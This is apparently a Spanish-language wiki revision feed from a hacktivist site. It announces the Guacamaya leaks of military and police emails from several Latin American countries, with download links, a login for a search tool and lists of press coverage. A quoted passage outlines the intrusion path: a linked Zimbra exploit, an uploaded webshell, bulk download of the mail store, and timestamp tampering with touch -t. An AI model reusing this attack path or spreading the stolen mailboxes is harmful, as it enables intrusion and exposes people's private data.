antes el 28 de abril documentan un derrame de 175 mil litros. Menos mal que escribieron un informe dónde dicen haber intentado realizar un saneamiento del<br />
área afectada, y así quedó satisfecho el Ministerio del "Poder Popular" para el "Ecosocialismo", con un informe.<br />
<br />
== Tejucana ==<br />
<br />
Cinismo y perversidad.<br><br />
Tejucana, minera Brasileña que termina cada correo con el pie de página:<br />
<blockquote><br />
Antes de imprimir pense em sua responsabilidade<br />
e compromisso com o meio ambiente<br />
</blockquote><br />
<br />
Pensamos que las residentes de [https://www.folhadebrumadinho.com.br/noticias/meio-ambiente/mineradora-tejucana-e-interditada-pela-anm/ Brumadinho] duermen tranquila y placidamente sabiendo el gran compromiso que tiene esta empresa con el medio ambiente...<br />
hasta que vimos todo los correos a "ncopiadora" y oh! la empresa imprime bastante, y con tinta de color.<br />
<br />
== Ministerio de Ambiente y Recursos Naturales ==<br />
<br />
Los Ministerios de Ambiente son quienes, en vez de protegerlo, reparten y [https://lahora.gt/nacionales/wpcomvip/2016/02/27/marn-descontrol-corrupcion-e-impunidad-en-torno-a-los-recursos-naturales/ venden nuestra milenaria herencia a empresas privadas.] Con la utópica esperanza de que el MARN esta cumpliendo una pequeña parte de su deber de cuidar el ambiente, y el miedo de que publicar sus correos podría perjudicar eso, la guacamaya nos pide compartir sus correos solamente con periodistas, organizaciones o individuos, que puedan verificar que tienen un interes legítimo en investigar a MARN. Para acceso a sus correos, contacta con [[Contact|nosotros]] o [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== Descargar ==<br />
<br />
Se puede buscar y ver los correos [https://piler.enlacehacktivista.org aquí,] y descargar todo [https://files.enlacehacktivista.org aquí.] El buscador lo hicimos para tener algo público y facilmente asequible, pero puede no encontrar correos. Si está haciendo una investigación seria recomendamos usar una maquína virtual aparte, descargar todo e importar todo los .eml en un cliente de correo, como por ejemplo Thunderbird con [https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ ImportExportTools NG.]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=633Fuerzas Represivas2022-11-08T23:45:35Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://ddosecrets.com/wiki/Secretar%C3%ADa_de_la_Defensa_Nacional_de_M%C3%A9xico#Research<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
* https://lahojadelpueblo2022.blogspot.com/2022/10/el-ejercito-le-seguia-los-pasos-al.html<br />
* https://www.proceso.com.mx/nacional/2022/11/6/cndh-estalla-por-reportaje-de-proceso-que-revela-ordenes-de-la-sedena-sobre-caso-ayotzinapa-296486.html<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm<br />
* https://www.elfaro.net/es/202210/el_salvador/26443/PNC-supo-de-la-liberaci%C3%B3n-ilegal-de-Crook-desde-noviembre-de-2021.htm</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=632Fuerzas Represivas2022-11-07T18:13:44Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://ddosecrets.com/wiki/Secretar%C3%ADa_de_la_Defensa_Nacional_de_M%C3%A9xico#Research<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
* https://lahojadelpueblo2022.blogspot.com/2022/10/el-ejercito-le-seguia-los-pasos-al.html<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm<br />
* https://www.elfaro.net/es/202210/el_salvador/26443/PNC-supo-de-la-liberaci%C3%B3n-ilegal-de-Crook-desde-noviembre-de-2021.htm</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fiscalia&diff=631Fiscalia2022-11-07T18:00:05Z<p>Enlacehacktivista: </p>
<hr />
<div><languages/><br />
<translate><br />
<!--T:2--><br />
El grupo hacker "Guacamaya" publicó un [https://enlacehacktivista.org/comunicado_guacamaya3.txt comunicado] junto con mas de 5 TB de correos de la Fiscalia de Colombia. Dice tener datos sensibles de muchas personas, por lo cual aclara que solo seŕa compartidos con periodistas y otras personas u organizaciones que puedan garantizar que solo van a usarlo para investigar a miembros de la Fiscalia y sus vinculos con narco trafico, militares y paramilitares entes del gobierno y empresas corruptas. Para tener acceso contacta con [[Contact|nosotros]] o [mailto:press@ddosecrets.com DDoSecrets.]<br />
</translate><br />
<br />
== Cobertura mediática ==<br />
<br />
* https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (sin paywall)]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=630Fuerzas Represivas2022-10-29T17:46:47Z<p>Enlacehacktivista: /* El Salvador */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
